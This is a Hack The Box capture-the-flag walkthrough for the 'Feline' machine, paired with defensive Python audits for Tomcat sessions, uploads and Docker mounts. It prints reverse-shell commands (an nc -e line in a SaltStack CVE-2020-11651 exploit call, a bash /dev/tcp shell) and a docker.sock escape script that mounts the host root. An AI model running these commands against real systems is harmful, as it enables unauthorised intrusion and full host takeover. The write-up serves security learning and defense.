Hack The Box — Feline

Hey folks, today we have a new HTB walkthrough for one of the best hard machines, “Feline”.

What will we do?

As usual, we follow the same steps to pwn any machine:

  1. Recon / Information gathering
  2. Scanning
  3. Gaining Access
  4. Maintaining Access
  5. Reporting / Analysis

After finishing these steps we will have all the information we need; stay calm and keep reading :)

1. Information Gathering

In this step we aim to collect all the information we can about the target: its open ports, how the login systems are secured, directories, OS version, service versions, etc.

We will start with nmap to cover the items above:

nmap -A -T4 or nmap -sS -sV -T4 -O

We have 2 open ports, 22 and 8080, and we know the server behind each one: OpenSSH and Apache Tomcat. So let’s check the website to see what we have.

After checking all the available endpoints and directories, I’ve found that /services works

We have an upload function which accepts any file (txt, php, exe, etc.), so we can tell that it validates neither the content nor the file extension.

For now let’s search for any other information and note what we have got.

For the Apache Tomcat server version I’ve searched for available CVEs and found that it’s vulnerable to RCE.

So we have another important piece of info: our Tomcat may be vulnerable to CVE-2020-9484.

I say “may be vulnerable” because it may have been patched on this machine.

While checking the vulnerability details, I found this awesome blog which discusses how to exploit it and why it works.

After reading, the prerequisites are:

  1. The PersistentManager is enabled and uses a FileStore
  2. The attacker is able to upload a file with arbitrary content, has control over the filename and knows the location where it is uploaded
  3. There are gadgets in the classpath that can be used for a Java deserialization attack
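To check these prerequisites from the defender's side, here is an added example (not code from the original post or from the Tomcat project) that audits a Tomcat context.xml for a PersistentManager backed by a FileStore and for a missing sessionAttributeValueClassNameFilter allow-list; both context fragments are constructed samples.

```python
"""Audit a Tomcat context.xml for the CVE-2020-9484 preconditions (added example)."""
import xml.etree.ElementTree as ET

PERSISTENT_MANAGER = "org.apache.catalina.session.PersistentManager"
FILE_STORE = "org.apache.catalina.session.store.FileStore"

# Constructed sample: the weak configuration described by the prerequisites above.
WEAK_CONTEXT = """<Context>
  <Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.store.FileStore" directory="/var/tmp/sessions"/>
  </Manager>
</Context>"""

# Constructed sample: same manager, but the classes a stored session may contain are allow-listed.
HARDENED_CONTEXT = r"""<Context>
  <Manager className="org.apache.catalina.session.PersistentManager"
           sessionAttributeValueClassNameFilter="java\.lang\.(?:Boolean|Integer|Long|Number|String)">
    <Store className="org.apache.catalina.session.store.FileStore" directory="sessions"/>
  </Manager>
</Context>"""


def audit_context(xml_text):
    """Return the list of findings for one context.xml document."""
    findings = []
    root = ET.fromstring(xml_text)
    for manager in root.iter("Manager"):
        if manager.get("className") != PERSISTENT_MANAGER:
            continue  # the default StandardManager keeps sessions in memory only
        store = manager.find("Store")
        if store is None or store.get("className") != FILE_STORE:
            continue
        findings.append("PersistentManager with FileStore: sessions are deserialized from files on disk")
        # The filter is a regex allow-list of attribute classes Tomcat will deserialize;
        # without it, any gadget class on the classpath is accepted (prerequisite 3).
        if not manager.get("sessionAttributeValueClassNameFilter"):
            findings.append("no sessionAttributeValueClassNameFilter: unrestricted deserialization")
    return findings


if __name__ == "__main__":
    for name, doc in (("weak", WEAK_CONTEXT), ("hardened", HARDENED_CONTEXT)):
        print(name, audit_context(doc))
```

Upgrading Tomcat is still the real fix; the filter only narrows what an on-disk session may contain.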

For now we have finished this step, so let’s jump to the next one.

2. Scanning

In this step we aim to go through all the info collected in the previous one, so let’s check whether we have the prerequisites or not.

We need to check if:

  1. Do we have an upload function?
  2. Is PersistentManager enabled?
  3. Do we know the path of the uploaded file on the server?
  4. Do we know the upload directory?

For the first one, we do have an upload function, so let’s try several uploads to check the results and learn the server behavior.

After uploading a txt file we get the upload directory from the request /upload.jsp?email=, which validates the exploit request, nice job :)

As I said before, it accepts any content we upload, so it doesn’t validate the content-type, the file content or the magic number. So let’s play with the filename.

I’ve triggered an error to see the server behavior, for example by renaming the file to a space or leaving the name empty.

Great! We have important information in the response, like the upload path on the server.
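As an added example (not the box's code), this is how an upload handler can close the gaps found above: a server-chosen filename, an extension allow-list, a magic-number check, and an error response that never reveals the storage path. The allowed-type table, the temporary upload directory and the sample uploads are assumptions.

```python
"""Upload handling that closes the gaps found above (added example, not the box's code)."""
import os
import secrets
import tempfile

# Assumed allow-list: extension -> magic bytes the content must start with
# (None means a plain-text sanity check is done instead).
ALLOWED_TYPES = {"png": b"\x89PNG\r\n\x1a\n", "pdf": b"%PDF-", "txt": None}
# Assumed storage location; it is chosen by the server and never sent to the client.
UPLOAD_DIR = tempfile.mkdtemp(prefix="uploads-")


def check_upload(filename, content):
    """Return None if the upload is acceptable, else a server-side reason (for logs only)."""
    base = os.path.basename(filename)
    if not base or base != filename or ".." in filename or "\x00" in filename:
        return "filename contains a path component, traversal or NUL"
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_TYPES:
        return f"extension {ext!r} not in allow-list"  # blocks jsp/php/exe and no extension
    magic = ALLOWED_TYPES[ext]
    if magic is not None and not content.startswith(magic):
        return "content does not match the declared type"
    if magic is None and b"\x00" in content:
        return "binary content disguised as text"
    return None


def store_upload(filename, content):
    """Validate, then write under a random server-chosen name; return only an opaque id."""
    reason = check_upload(filename, content)
    if reason is not None:
        print(f"[audit] rejected {filename!r}: {reason}")  # stays on the server side
        return {"ok": False, "error": "upload rejected"}  # no path and no reason for the client
    ext = filename.rsplit(".", 1)[-1].lower()
    token = secrets.token_hex(16)
    with open(os.path.join(UPLOAD_DIR, f"{token}.{ext}"), "xb") as fh:  # exclusive create
        fh.write(content)
    return {"ok": True, "id": token}


if __name__ == "__main__":
    # Constructed sample uploads mirroring what the box accepted without any checks.
    for name, data in (("notes.txt", b"hello"), ("shell.jsp", b"<% %>"), ("../../x.txt", b"x")):
        print(name, store_upload(name, data))
```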

Let’s search for any public exploit code to save our time.

This repo is amazing; it collects all the steps in a sh file, but it requires downloading the ysoserial jar file to generate the payload.

You can download it from here

Okay, that’s enough here, let’s jump to the next step.

3. Gaining Access

After checking all the exploit requirements, let’s run it, with nc as our listener.

It returns a shell :) Fantastic

Now we need to escalate our privileges to get the root user, so let’s jump to the next step.

4. Maintaining Access

In this step we aim to find any information that is leaked or not handled well and use it to gain new privileges; you can use linpeas, LinEnum or even check manually.

Anyway, after checking the network state using the netstat command:

I’ve found 2 ports listening on localhost, 4505 and 4506, and after searching for them I’ve discovered that they belong to software called SaltStack.

After some searching, I discovered that it’s vulnerable to CVE-2020-11651!!

After checking the vulnerability details from here

Here’s the command and its arguments:

python3 exploit.py --master --exec "nc xx.xx.xx.xx xxxx -e /bin/sh"

It works against the port listening on 4506, and in our case that’s bound to localhost only, so we need to set up port tunneling using chisel.

Local machine:
./chisel server -p 80 --reverse
Vulnerable machine:
./chisel client 10.10.xx.xx:80 R:4506:

Let’s execute our exploit to get another shell…

Unfortunately!! We don’t have root.txt, but we have a hint telling us that we’re inside a Docker container.

After enumerating the box again, I’ve found a file called /run/docker.sock

After searching for docker.sock privilege escalation I’ve found this blog, and this blog is awesome too.

So now we have the exploit code, after checking the blogs above and asking a friend for help:

pay="bash -c 'bash -i >& /dev/tcp/10.10.xx.xx/8888 0>&1'"
payload="[\"/bin/sh\",\"-c\",\"chroot /mnt sh -c \\\"$pay\\\"\"]"
# Create a container from the "sandbox" image with the host root bind-mounted at /mnt
response=$(curl -s -XPOST --unix-socket /var/run/docker.sock -d "{\"Image\":\"sandbox\",\"cmd\":$payload, \"Binds\": [\"/:/mnt:rw\"]}" -H 'Content-Type: application/json' http://localhost/containers/create)
revShellContainerID=$(echo "$response" | cut -d'"' -f4)
# Start it, then read its output
curl -s -XPOST --unix-socket /var/run/docker.sock http://localhost/containers/$revShellContainerID/start
sleep 1
curl --output - -s --unix-socket /var/run/docker.sock "http://localhost/containers/$revShellContainerID/logs?stderr=1&stdout=1"

After running it, let’s see what we have on the listener:

It works, and we’ve accessed root.txt and got Super User privileges :)
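From the host side, the risk above is a container that was started with the Docker socket or the host root bind-mounted into it. As an added example (not from the post or from Docker), here is an audit over docker inspect output that flags such mounts and privileged containers; the JSON is a constructed sample.

```python
"""Flag containers whose configuration enables the socket-based escape above (added example)."""
import json

DOCKER_SOCKETS = ("/run/docker.sock", "/var/run/docker.sock")

# Constructed sample in the shape of `docker inspect` output (only the fields used here).
SAMPLE_INSPECT = json.dumps([
    {"Name": "/sandbox",
     "HostConfig": {"Binds": ["/run/docker.sock:/run/docker.sock", "/:/mnt:rw"],
                    "Privileged": False}},
    {"Name": "/web",
     "HostConfig": {"Binds": ["/srv/web/data:/data:ro"], "Privileged": False}},
    {"Name": "/agent",
     "HostConfig": {"Binds": [], "Privileged": True}},
])


def audit_containers(inspect_json):
    """Return {container name: [findings]} for every risky container in the inspect output."""
    report = {}
    for container in json.loads(inspect_json):
        findings = []
        host_config = container.get("HostConfig", {})
        for bind in host_config.get("Binds") or []:
            src, _, rest = bind.partition(":")  # host path : container path [: options]
            if src in DOCKER_SOCKETS:
                findings.append(f"docker socket mounted ({bind}): full control of the daemon")
            elif src == "/":
                opts = rest.partition(":")[2].split(",")  # e.g. ["rw"] or ["ro", "z"]; default is rw
                mode = "ro" if "ro" in opts else "rw"
                findings.append(f"host root mounted {mode} ({bind}): chroot into the host is possible")
        if host_config.get("Privileged"):
            findings.append("privileged container: host devices and capabilities exposed")
        if findings:
            report[container.get("Name", "?")] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_containers(SAMPLE_INSPECT).items():
        print(name)
        for f in findings:
            print("  -", f)
```

Feed it `docker inspect $(docker ps -q)` on the host to review every running container at once.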

If you speak Arabic, you can watch my walkthrough, in which I’ve explained all these steps, from here

If you find it helpful, kindly give me a respect from here eslam3kl — HTB

Stay in touch

LinkedIn | GitHub | Twitter




Eslam Akl

Penetration Tester, Bug Hunter, Author of 10 CVEs, Author of multiple security tools, and more :) You can find me on Twitter @eslam3kll